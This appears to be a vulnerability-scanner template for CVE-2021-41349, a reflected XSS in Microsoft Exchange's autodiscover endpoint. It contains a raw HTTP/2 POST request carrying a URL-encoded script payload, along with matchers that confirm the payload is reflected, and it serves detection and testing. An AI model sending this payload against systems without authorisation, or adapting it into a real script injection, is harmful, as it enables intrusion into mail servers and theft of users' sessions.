id: CVE-2021-41349-http2

info:
  name: Pre-Auth POST Based Reflected XSS in Microsoft Exchange
  author: rootxharsh,iamnoooob
  severity: medium
  tags: cve,cve2021,xss,microsoft,exchange
  description: Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-42305.
  reference:
    - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41349
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 6.50
    cve-id: CVE-2021-41349

requests:
  - raw:
      - |
        POST /autodiscover/autodiscover.json HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        %3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'alert(document.domain);'
          - 'a=""'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 500
